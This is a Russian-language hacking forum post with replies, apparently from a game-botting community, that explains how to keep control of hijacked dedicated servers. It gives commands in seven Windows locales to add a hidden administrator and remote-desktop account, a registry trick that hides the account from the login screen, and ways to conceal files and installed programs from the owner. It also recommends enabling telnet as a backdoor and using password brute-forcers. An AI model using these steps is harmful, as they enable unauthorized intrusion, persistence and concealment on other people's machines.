В последнее время, дорогие форумчане, участились обращения ко мне в л.с.
с вопросами, касающимися прежде всего выделенных серверов ( дедиков )
Так вот, в этой теме я решил покончить с этим раз и навсегда.
Я выкладываю вам сайт , где вы найдете:
- Кучу статей , разжеванных для новичков , обьясняющих что и как делать
- Ряд брутов и чекеров ( программ для поиска и подбора паролей ) к сервам
- и много много разных интересных вещей
От себя советую обратить внимание на программу Hide User ( программу для скрытия учетных записей пользователей ) .
Информация для новичков находится в нижнем правом углу сайта!!!
Данная тема позволит вам не менять дедик каждый день , создать на нем свою учетную запись и обезопасить себя ( для озабоченных я не имею ввиду что там раздают контрацептивы ) и наслаждатся плодами ботоводства.
сайт : [Ссылки могут видеть только зарегистрированные пользователи. ] ( удалился почему-то , поправил )
Так же выкладываю информацию, как вы можете создать собственную учетную запись на сервере на разных языках: ( вводить в командной строке , она вызывается : выполнить(run) ===> cmd.exe )
Имя создаваемой учётной записи - Onotole, пароль - 123321
Английский (English)
net user Onotole 123321 /add
net localgroup Administrators Onotole /add
net localgroup "Remote desktop users" Onotole /add
Русский (Russian)
net user Onotole 123321 /add
net localgroup Администраторы Onotole /add
net localgroup "Пользователи удаленного рабочего стола" Onotole /add
Немецкий (Germany):
net user Onotole 123321 /add
net localgroup Administratoren Onotole /add
net localgroup "RemoteDesktopBenutzer" Onotole /add
Португалия (Portugal)
net user Onotole 123321 /add
net localgroup Administradores Onotole /add
net localgroup "Utilizadores do ambiente de trabalho remoto" Onotole /add
Италия (Italy):
net user Onotole 123321 /add
net localgroup Administrators Onotole /add
net localgroup "Utenti desktop remoto" Onotole /add
Испания (Spain)
net user Onotole 123321 /add
net localgroup Administradores Onotole /add
net localgroup "Usuarios de escritorio remoto" Onotole /add
+ ко всему советую написать net accounts /maxpwage:unlimited
Нидерланды\Голландия (Netherlands\Holland)
net user Onotole 123321 /add
net localgroup Administrators Onotole /add
net localgroup "Externe Bureaubladgebruikers" Onotole /add
Я надеюсь , что после этой темы, навсегда отпадут вопросы и ряд ненужных тем подобного типа в разделе Даркорбит.
Добавлено:
1) Мультиюзерность: :group:
если ломаем winxp sp2\sp3, то сразу после создания акка (или во взломанном акке) сливаем на дедик этот ([Ссылки могут видеть только зарегистрированные пользователи. ]) патч (естественно предварительно залитый на файлообменник) и запускаем его. спросит перезагрузить вконце установки - жмем НЕТ и переходим к пункту 2 ->
2) Ныкаем свой созданный акк из вин-логона:
пуск->выполнить->пишем regedit клацаем Enter->переходим в HKEY_LOCAL_MACHINE\SOFTWARE\Mi crosoft\Windows NT\CurrentVersion\Winlogon\Spe cialAccounts\UserList и создаем там новый параметр DWORD, название параметра=название нашего акка, численное значение 0. Всё теперь в винлогоне наш ник не палицо =) :admin: . Теперь ребутим дедик, дабы активировать мультиюзерность.
3) Ныканье файлов и прог
Дабы не смущать админа новой папкой акка в документз энд сеттингс скрываем её со всеми файлами и подкаталогами (свойства -> атрибуты: ставим птичку на "скрытый" и применить). Все свои файлы можно лить на десктоп, ибо он теперь скрытый, но я бы посоветовал создать для них папку какую-нить (скажем inst) например в c:\windows\system32 и тож скрытые атрибуты ей поставить . Есть еще способ - программка Hide Folders XP ([Ссылки могут видеть только зарегистрированные пользователи. ]. html) (с помощью неё можно более глубже скрыть файл, или вобще доступ к папке\файлу запретить\запоролить). Теперь насчет прог. Если установили какое\либо ПО, чтоб заныкать его от назойливых админских глаз, идём в реестр: пуск->выполнить->пишем regedit клацаем Enter->переходим в HKEY_LOCAL_MACHINE\SOFTWARE\Mi crosoft\Windows\CurrentVersion \Uninstall\ и там ищем название установленной проги трём все данные о ней . Всё, теперь в Add or Remove programms нашей проги нету...
4) ОБЩИЕ рекомендации
Низя оч сильно нагружать систему :brute:, где-то на 30-40% проца и 1\3 памяти (макс на 50-60% проца и половину памяти) ибо это будет заметно. Очень рекомендую залезть в панель управления-> инструменты админа-> службы и врубить там службу telnet (служба терминального доступа к компу), поставив ек в режим автозапуска. Даже если не умеете её юзать - потеряв ценный дедик научитесь (погуглив естессьно). Это как черный ход на комп, если парадный запечатали. (конечно заранее надо разрешить в фаерволе 23 TCP порт, если дедик с фаером работает). Также можите в службах поискать внц\радмин и вырубить (и перевести в ручной запуск, ибо в дисейбл если переведёте то как-то немного палевно, имхо). Мона ещё прошерстить группу Remote Administrator Users на наличие других хакеров на компе (их легко определить - обычно в их папках всякие проги для создания бот-сетей, внц-сканеры, гидры, тсс-гриндеры и прочий софт для хакка) Только осторожно - не удалите случайно легальных юзеров
Если файлы не скачиваются, просто загуглите
Последний раз редактировалось Destroyer74; 26.02.2011 в 23:21.
Причина: добавил инфы
тоже хотел создать такую тему и как раз указать этот сайт тама и бруты есть и все а то на форуме все чаше начили выкладывать по одному бруту или сканеру автору + и не помешало бы закрепить тему что опять не создовали таких тем про очередной брутофорс
Это прокатит только на тех дедах где админы с интеллектом ниже плинтуса или тупо забили на серв.
Добавляй инфу про скрытие созданного пользователя на обычных компах, а так же на серверных системах. Тогда статья будет полезна.